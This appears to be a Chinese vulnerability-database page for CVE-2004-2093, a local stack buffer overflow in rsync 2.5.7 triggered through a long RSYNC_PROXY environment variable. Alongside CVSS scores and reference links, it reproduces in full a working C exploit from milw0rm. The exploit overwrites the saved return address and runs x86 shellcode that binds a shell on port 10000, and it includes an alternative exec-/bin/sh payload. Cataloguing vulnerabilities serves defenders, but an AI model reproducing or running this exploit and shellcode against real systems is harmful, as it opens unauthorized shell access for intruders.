CVE-2004-2093
CVSS4.6
发布时间 :2004-02-09 00:00:00
修订时间 :2008-09-05 16:43:10
NMCOE    

[原文]Buffer overflow in the open_socket_out function in socket.c for rsync 2.5.7 and earlier allows local users to cause a denial of service (crash) and possibly execute arbitrary code via a long RSYNC_PROXY environment variable. NOTE: since rsync is not setuid, this issue does not provide any additional privileges beyond those that are already available to the user. Therefore this issue may be REJECTED in the future.


[CNNVD]socket.c for rsync缓冲区溢出漏洞(CNNVD-200402-040)

        rsync 2.5.7及早期版本中socket.c的open_socket_out函数存在缓冲区溢出漏洞。本地用户借助一个长的RSYNC_PROXY环境变量导致服务拒绝(崩溃)和可能执行任意代码。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2093
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2093
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200402-040
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/15108
(PATCH)  XF  linux-rsync-opensocketout-bo(15108)
http://archives.neohapsis.com/archives/vuln-dev/2004-q1/0091.html
(VENDOR_ADVISORY)  VULN-DEV  20040209 rsync <= 2.5.7 local buffer overflow (no root today:)

- 漏洞信息

socket.c for rsync缓冲区溢出漏洞
中危 缓冲区溢出
2004-02-09 00:00:00 2005-10-20 00:00:00
本地  
        rsync 2.5.7及早期版本中socket.c的open_socket_out函数存在缓冲区溢出漏洞。本地用户借助一个长的RSYNC_PROXY环境变量导致服务拒绝(崩溃)和可能执行任意代码。

- 公告与补丁

        

- 漏洞信息 (152)

rsync <= 2.5.7 Local stack overflow Root Exploit (EDBID:152)
linux local
2004-02-13 Verified
0 Abhisek Datta
N/A [点击下载]
/* 
* rsync <= 2.5.7 Local Exploit
* Saved EIP on stack is overwritten with address of shellcode in memory
* Generally rsync is not setuid or setgid so just a local shell is of no use
* So i used a portbinding shellcode as a PoC of a different attack vector.
* RET is calculated dynamically so payload can be changed just by changing shellcode
* Tested on:
* [eos@Matrix my]$ uname -a
* Linux Matrix 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
* coded by: abhisek linuxmail org
* Special Thanks: n2n, Hirosh Joseph
*/

#include <stdio.h>
/* Includes for code to daemonize */
#include <signal.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <fcntl.h>
/****/
#define PATH "/usr/local/bin/rsync"
#define BUFF_SIZE 100
//#define RET 0xbffffdfb

/* 88 bytes portbinding shellcode - linux-x86
* - by bighawk (bighawk warfare com)
*
* This shellcode binds a shell on port 10000
* stdin, stdout and stderr are dupped. accept() arguments are sane.
*/
char shellcode[] =
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax
"\x52" // push edx
"\x66\x68\x27\x10" // push word 4135
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe1" // mov ecx, esp
"\xb0\x10" // mov al, 16
"\x50" // push eax
"\x51" // push ecx
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\xb0\x66" // mov al, 102
"\xb3\x04" // mov bl, 4
"\xcd\x80" // int 80h
"\x50" // push eax
"\x50" // push eax
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xc3" // mov ebx, eax
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop lp
"\x51" // push ecx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\x0b" // mov al, 11
"\xcd\x80"; // int 80h
/* Shellcode by n2n [n2n@linuxmail.org] used for initial testing */
/*
char shellcode[]=
// setreuid(geteuid(),geteuid()), no use unless rsync is setuid, usually its not 
"\x31\xc0\xb0\x31\xcd\x80\x93\x89\xd9\x31\xc0\xb0\x46\xcd\x80"
// setregid(getegid(),getegid()) 
"\x31\xc0\xb0\x32\xcd\x80\x93\x89\xd9\x31\xc0\xb0\x47\xcd\x80"
// exec /bin/sh 
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
// exit() 
"\x31\xdb\x89\xd8\xb0\x01\xcd\x80";
*/
void handler(int sig) {
int stat;
pid_t pid;
while ((pid = waitpid(-1, &stat, WNOHANG)) > 0) { }
return;
}
void go_daemon() {
int i;
if(fork())
exit (0);
setsid();
i=open("/dev/null",O_RDWR);
dup2(i, 0);
dup2(i, 1);
dup2(i, 2);
close(i);
for (i=1;i<64;i++)
signal(i,SIG_IGN);
signal(SIGCHLD,handler);
}
int main(int argc,char *argv[]) {
char *buffer;
int size=BUFF_SIZE,i;
//unsigned long ret_addr=0xbffffffa;
unsigned long ret_addr=0xbffffffa;
//char *expbuff;
char *arg="localhost::rsync:getaddrinfo:XXX";
if(argc > 2) {
printf("USAGE:\n%s BUFF_SIZE\n",argv[0]);
exit(1);
}
if(argc == 2)
size=atoi(argv[1]);
buffer=(char*)malloc(size);
if(!buffer) {
printf("Error allocating memory on heap\n");
exit(1);
}
ret_addr -= strlen(PATH);
ret_addr -= strlen(shellcode);
//ret_addr -= strlen(arg);
/*
expbuff=(char*)malloc(strlen(shellcode)+100);
if(!expbuff) {
printf("Error allocating memory on heap\n");
exit(1);
}
memset(expbuff,0x90,strlen(shellcode)+100);
memcpy(expbuff+80,shellcode,strlen(shellcode));
expbuff[strlen(expbuff)-1]=0x00;
*/
for(i=0;i<size;i+=4) 
*(unsigned long*)(buffer+i)=ret_addr; 
memcpy(buffer,"XXX:",4);
buffer[strlen(buffer)-1]=0x00;
printf("Using BUFF_SIZE=%d\nRET=%p\n",size,ret_addr);
setenv("RSYNC_PROXY",buffer,1);
setenv("EGG",shellcode,1);
/* Daemonizing and executing /usr/local/bin/rsync */
go_daemon();
execl(PATH,PATH,arg,NULL);
return 0;
}


// milw0rm.com [2004-02-13]
		

- 漏洞信息

45182
rsync socket.c open_socket_out Function RSYNC_PROXY Environment Variable Overflow Local DoS
Local Access Required Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability

- 漏洞描述

- 时间线

2004-02-09 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站